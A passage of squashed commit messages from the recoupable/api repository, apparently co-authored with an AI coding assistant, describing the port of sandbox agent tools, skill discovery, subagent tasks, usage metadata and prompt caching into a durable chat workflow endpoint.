  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597)

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded
`workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set
`currentBranch`, so the agent had no environment info in its system
prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):
  agent: "My system prompt does not contain working directory or
         branch information."

After this fix the agent receives an Environment section + Current
branch line + cloud-sandbox checkpointing block — same shape as
open-agents (sandbox.recoupable.com) emits.

Changes:
- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles
  environment section → Current branch → cloud-sandbox checkpointing
  → custom instructions, all conditional on inputs. Mirrors
  open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports
  open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}`
  placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill
  discovery AND cwd/branch reading, then thread real values into
  `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On
  connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves
  today's behavior; tools surface real errors later when they
  reconnect).
- `runAgentStep`: build the system prompt via
  `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})`
  instead of using the static `agentCustomInstructions` directly.

Scope reduced from the original "A.7+9" bundle: dropped contextLimit
plumbing because it's a client-side display concern in open-agents,
not server-side model routing (verified via grep — open-agents'
server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring);
full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's
deployment topology, so the per-branch `Current branch: <name>` line
and cloud-sandbox checkpointing block don't add information today.
Strip the templating to keep the system prompt focused on what's
load-bearing (the Environment section indicating workspace-relative
paths).

- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of
  open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real
  per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options +
  rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream
  (the field stays on AgentContext.sandbox for type completeness;
  also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g.
xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e245 — runAgentStep was still passing
`currentBranch: input.agentContext.sandbox.currentBranch` after
buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599)

Fourth open-agents → api cutover bundle. runAgentStep was sending the
same system prompt + tool definitions on every turn as fresh input,
even though Anthropic prompt caching can shave 90% off subsequent
input cost. Production traces showed `cacheReadTokens: 0` on every
api turn, while open-agents shows cacheRead matching cacheWrite from
the prior turn — i.e. open-agents reuses the cached prefix.

Changes (SRP — one function per file):
- `lib/agent/contextManagement/isAnthropicModel.ts` — predicate
  port of open-agents'
  `packages/agent/context-management/cache-control.ts:5`.
- `lib/agent/contextManagement/addCacheControlToTools.ts` — marks
  the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only
  conserves Anthropic's 4-breakpoint limit.
- `lib/agent/contextManagement/addCacheControlToMessages.ts` —
  marks the LAST message with `cacheControl` on every step, per
  Anthropic's "mark the final block of the final message" guidance.

`runAgentStep` now:
- Wraps the tool set via `addCacheControlToTools(...)` before passing
  to streamText (static — set once per step).
- Adds a `prepareStep` callback that wraps `messages` via
  `addCacheControlToMessages(...)` on every internal model call.

Production behavior reproducer (Haiku 4.5, identical 2-turn prompt
to both backends):
  api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952
                     turn2 cacheWrite=0 cacheRead=0 cost=$0.005959
                     → flat cost; full input billed every turn.
  open-agents prod:  turn1 cacheWrite=10966 cacheRead=0
                     turn2 cacheWrite=12    cacheRead=10966 cost drops 12x
                     → near-full prefix re-read from cache on turn 2.

After this PR, api should match open-agents' caching curve.

Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5
addCacheControlToMessages + 2 runAgentStep wiring assertions); full
suite 3138/3138 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 22, 2026
…ver bundle (#602)

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

